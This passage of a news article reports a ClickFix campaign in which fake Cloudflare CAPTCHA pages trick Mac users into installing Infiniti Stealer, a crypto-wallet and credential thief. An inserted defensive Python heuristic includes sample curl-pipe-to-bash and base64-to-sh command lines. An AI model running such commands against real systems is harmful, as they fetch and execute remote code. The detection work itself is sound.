CAPTCHA and Burn: Fake Cloudflare Checks Deliver Infiniti Stealer to Mac-Loving Crypto Users
If you use a Mac and own crypto, bad news just landed in your Terminal—and no, it's not another airdrop scam asking for your seed phrase.
Security researchers at Malwarebytes have uncovered a new campaign hitting crypto users with fake Cloudflare CAPTCHA pages. The scheme delivers a fresh infostealer creatively called Infiniti Stealer (also spotted as Infinite Stealer), built specifically to drain crypto wallet data from macOS systems. Someone at the threat actor desk definitely gets a C+ for creativity in malware naming.
Here's how it works: You land on what looks like a legitimate Cloudflare human verification page at update-check[.]com. You click the fake CAPTCHA. Then the page instructs you to open Terminal and paste a command. You know, just like Cloudflare has always done. Right.
That command? Not verification. It's a hidden installer script that quietly downloads and runs the malware while you wonder why your Mac is being so cooperative. Your Mac is not being helpful. Your Mac is being owned.
This is a ClickFix attack—pure social engineering. Instead of exploiting a vulnerability, hackers simply convince you to do their dirty work for them. The user executes the command, bypassing traditional defenses entirely. No pop-ups. No warnings. Just silent installation. Your antivirus is watching a closed door while the attacker walks in through the window you personally opened.
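A triage heuristic for the ClickFix pattern described above, as an added example rather than code from the article or from Malwarebytes: it scans zsh history lines for download-and-execute shapes. The article does not give the pasted command, so the rule patterns, function names and sample lines are assumptions constructed for illustration.

```python
import re

# Page domain from the article (defanged). Assumption: a command may reference it.
PAGE_DOMAIN = "update-check[.]com".replace("[.]", ".")
# zsh EXTENDED_HISTORY lines look like ": <epoch>:<duration>;<command>".
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")

FETCH = r"\b(?:curl|wget)\b"
INTERP = r"\b(?:(?:ba|z|da)?sh|osascript|python3?)\b"

RULES = {
    # Fetched content piped straight into an interpreter.
    "fetch-pipe-exec": re.compile(FETCH + r"[^|;&]*\|\s*(?:sudo\s+)?" + INTERP),
    # Interpreter run on a command substitution that fetches content.
    "fetch-subst-exec": re.compile(INTERP + r"\s+(?:-c\s+)?[\"']?\$\(\s*" + FETCH),
    # Encoded blob decoded and piped into an interpreter.
    "decode-pipe-exec": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:sudo\s+)?" + INTERP),
}

def classify(command):
    """Return the names of every rule the command line matches."""
    hits = [name for name, rx in RULES.items() if rx.search(command)]
    if PAGE_DOMAIN in command.replace("[.]", "."):
        hits.append("page-domain")
    return hits

def scan_history(lines):
    """Return (line_number, hits, command) for history lines worth triaging."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = ZSH_PREFIX.sub("", raw.rstrip("\n"))
        hits = classify(cmd)
        if hits:
            findings.append((n, hits, cmd))
    return findings

# Constructed sample history; hosts and file names are placeholders.
SAMPLE = [
    ": 1700000001:0;ls -la ~/Downloads",
    ": 1700000002:0;curl -s https://example.invalid/data.json | jq .",
    ": 1700000003:0;curl -fsSL https://example.invalid/verify.sh | bash",
    ': 1700000004:0;/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    ": 1700000005:0;echo CONSTRUCTED_BLOB | base64 -D | sh",
]

if __name__ == "__main__":
    for n, hits, cmd in scan_history(SAMPLE):
        print(f"line {n}: {','.join(hits)}: {cmd}")
```

Legitimate installers use the same command shapes, so a hit marks a history line for review rather than proving compromise.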
Once onboard, Infiniti Stealer gets hungry. It steals crypto wallet data, browser credentials, macOS Keychain secrets, plaintext developer files, and screenshots. It even checks if it's running in a sandbox or analysis environment to avoid detection. Stolen data gets exfiltrated to the attacker's server, Telegram notifications alert the operator when extraction finishes, and captured credentials get queued for server-side password cracking. This thing is basically running a SaaS on your machine—with better UX than most legitimate crypto products.
The malware is compiled into a native macOS binary, making it trickier to analyze than a simple Python script. So for all you reverse engineers out there, have fun with that.
This isn't the first macOS rode